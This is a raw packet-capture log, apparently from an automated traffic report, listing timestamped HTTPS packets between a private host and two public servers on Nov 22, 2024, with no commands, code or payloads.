                                                                                                                                                                                                            Nov 22, 2024 04:27:35.707285881 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.707362890 CET49930443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.707437038 CET49930443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.707463026 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.707482100 CET49930443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.707489967 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.710268021 CET49935443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.710309982 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.710376978 CET49935443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.710516930 CET49935443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.710527897 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.757658005 CET49929443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:35.757680893 CET4434992913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:36.152137995 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:36.155251980 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:36.155354977 CET49931443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:36.200510979 CET49931443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:36.200534105 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:36.200546026 CET49931443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:36.200551987 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:36.206789017 CET49936443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:36.206815004 CET4434993613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:36.206881046 CET49936443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:36.207046986 CET49936443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:36.207057953 CET4434993613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:36.805083990 CET49937443192.168.2.4142.250.181.100
                                                                                                                                                                                                            Nov 22, 2024 04:27:36.805129051 CET44349937142.250.181.100192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:36.805192947 CET49937443192.168.2.4142.250.181.100
                                                                                                                                                                                                            Nov 22, 2024 04:27:36.805593967 CET49937443192.168.2.4142.250.181.100
                                                                                                                                                                                                            Nov 22, 2024 04:27:36.805608988 CET44349937142.250.181.100192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.007884026 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.008410931 CET49932443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.008436918 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.008865118 CET49932443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.008872986 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.278168917 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.278850079 CET49934443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.278877974 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.279308081 CET49934443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.279320955 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.306520939 CET4434993313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.307022095 CET49933443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.307050943 CET4434993313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.307391882 CET49933443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.307399988 CET4434993313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.431969881 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.432554007 CET49935443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.432589054 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.432988882 CET49935443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.432997942 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.451085091 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.454314947 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.454412937 CET49932443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.454474926 CET49932443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.454494953 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.454514027 CET49932443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.454520941 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.457523108 CET49938443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.457565069 CET4434993813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.457668066 CET49938443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.457844019 CET49938443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.457854986 CET4434993813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.711487055 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.714864969 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.714961052 CET49934443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.715002060 CET49934443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.715030909 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.715044022 CET49934443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.715050936 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.717823982 CET49939443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.717863083 CET4434993913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.717940092 CET49939443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.718112946 CET49939443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.718127012 CET4434993913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.759203911 CET4434993313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.762218952 CET4434993313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.762346983 CET49933443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.762346983 CET49933443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.762392044 CET49933443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.762411118 CET4434993313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.765043020 CET49940443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.765091896 CET4434994013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.765161037 CET49940443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.765294075 CET49940443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.765309095 CET4434994013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.867567062 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.870610952 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.870676041 CET49935443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.870724916 CET49935443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.870724916 CET49935443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.870752096 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.870763063 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.873476982 CET49941443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.873533010 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.873605013 CET49941443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.873740911 CET49941443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.873760939 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.985541105 CET4434993613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.986284971 CET49936443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.986299992 CET4434993613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.986738920 CET49936443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:37.986742973 CET4434993613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:38.428685904 CET4434993613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:38.431844950 CET4434993613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:38.431905031 CET49936443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:38.431991100 CET49936443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:38.431991100 CET49936443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:38.432005882 CET4434993613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:38.432013035 CET4434993613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:38.435817957 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:38.435873985 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:38.435965061 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:38.436109066 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:38.436120033 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:38.588748932 CET44349937142.250.181.100192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:38.589150906 CET49937443192.168.2.4142.250.181.100
                                                                                                                                                                                                            Nov 22, 2024 04:27:38.589181900 CET44349937142.250.181.100192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:38.589534044 CET44349937142.250.181.100192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:38.590131998 CET49937443192.168.2.4142.250.181.100
                                                                                                                                                                                                            Nov 22, 2024 04:27:38.590194941 CET44349937142.250.181.100192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:38.635134935 CET49937443192.168.2.4142.250.181.100
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.171111107 CET4434993813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.171731949 CET49938443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.171753883 CET4434993813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.172209978 CET49938443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.172215939 CET4434993813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.451061010 CET4434993913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.451613903 CET49939443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.451632023 CET4434993913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.452090979 CET49939443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.452096939 CET4434993913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.547615051 CET4434994013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.548146963 CET49940443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.548173904 CET4434994013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.548635006 CET49940443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.548640013 CET4434994013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.605362892 CET4434993813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.608434916 CET4434993813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.608536959 CET49938443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.608536959 CET49938443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.608576059 CET49938443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.608587980 CET4434993813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.611180067 CET49943443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.611229897 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.611310005 CET49943443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.611429930 CET49943443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.611448050 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.676754951 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.677212954 CET49941443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.677237034 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.677720070 CET49941443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.677728891 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.887325048 CET4434993913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.887373924 CET4434993913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.887428999 CET4434993913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.887495041 CET49939443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.887510061 CET49939443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.887713909 CET49939443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.887726068 CET4434993913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.887737989 CET49939443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.887742996 CET4434993913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.890461922 CET49944443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.890563011 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.890651941 CET49944443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.890799999 CET49944443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.890834093 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.991924047 CET4434994013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.992130041 CET4434994013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.992223024 CET49940443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.992435932 CET49940443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.992458105 CET4434994013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.992470980 CET49940443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.992476940 CET4434994013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.995795012 CET49945443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.995846987 CET4434994513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.995970011 CET49945443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.996172905 CET49945443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:39.996187925 CET4434994513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.123989105 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.127150059 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.127206087 CET49941443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.127226114 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.127250910 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.127301931 CET49941443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.127741098 CET49941443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.127756119 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.127763987 CET49941443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.127768993 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.131113052 CET49946443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.131175041 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.131243944 CET49946443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.131961107 CET49946443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.131974936 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.150870085 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.151545048 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.151582956 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.152000904 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.152007103 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.584582090 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.587805986 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.587902069 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.587954998 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.587975025 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.587985992 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.587991953 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.590856075 CET49947443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.590966940 CET4434994713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.591056108 CET49947443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.591217995 CET49947443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:40.591257095 CET4434994713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.482069969 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.482605934 CET49943443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.482634068 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.483150959 CET49943443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.483158112 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.613305092 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.613909006 CET49944443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.613964081 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.614368916 CET49944443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.614382029 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.780846119 CET4434994513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.781466007 CET49945443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.781501055 CET4434994513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.781961918 CET49945443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.781968117 CET4434994513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.928791046 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.931934118 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.932003975 CET49943443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.932208061 CET49943443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.932226896 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.932239056 CET49943443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.932244062 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.935386896 CET49948443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.935453892 CET4434994813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.935512066 CET49948443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.935730934 CET49948443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.935750008 CET4434994813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.981673956 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.982220888 CET49946443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.982284069 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.982666969 CET49946443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:41.982675076 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.048401117 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.051610947 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.051736116 CET49944443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.051784039 CET49944443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.051784039 CET49944443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.051805019 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.051816940 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.054533958 CET49949443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.054569006 CET4434994913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.054651022 CET49949443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.054779053 CET49949443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.054792881 CET4434994913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.222589016 CET4434994513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.225955963 CET4434994513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.226025105 CET4434994513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.226073980 CET49945443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.226156950 CET49945443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.226156950 CET49945443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.228286982 CET49945443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.228311062 CET4434994513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.229537010 CET49950443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.229590893 CET4434995013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.229671001 CET49950443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.229841948 CET49950443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.229855061 CET4434995013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.374495983 CET4434994713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.375070095 CET49947443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.375080109 CET4434994713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.375576973 CET49947443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.375581026 CET4434994713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.433324099 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.436299086 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.436431885 CET49946443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.436506033 CET49946443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.436506033 CET49946443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.436537981 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.436554909 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.439148903 CET49951443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.439202070 CET4434995113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.439299107 CET49951443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.439440012 CET49951443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.439456940 CET4434995113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:42.817472935 CET4434994713.107.246.63192.168.2.4
